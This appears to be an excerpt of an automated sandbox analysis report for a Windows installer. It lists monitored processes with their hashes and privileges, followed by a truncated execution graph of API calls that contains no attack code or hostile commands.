                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                                                                                          Start time:11:23:30
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                                                                                          Start time:11:23:31
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                                          Imagebase:0x3c0000
                                                                                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                                                                                          Start time:11:24:05
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1136 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                                                            Execution Coverage:17.7%
                                                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                            Signature Coverage:21%
                                                                                                                                                                                                                                                                                                                            Total number of Nodes:1482
                                                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                                                            execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 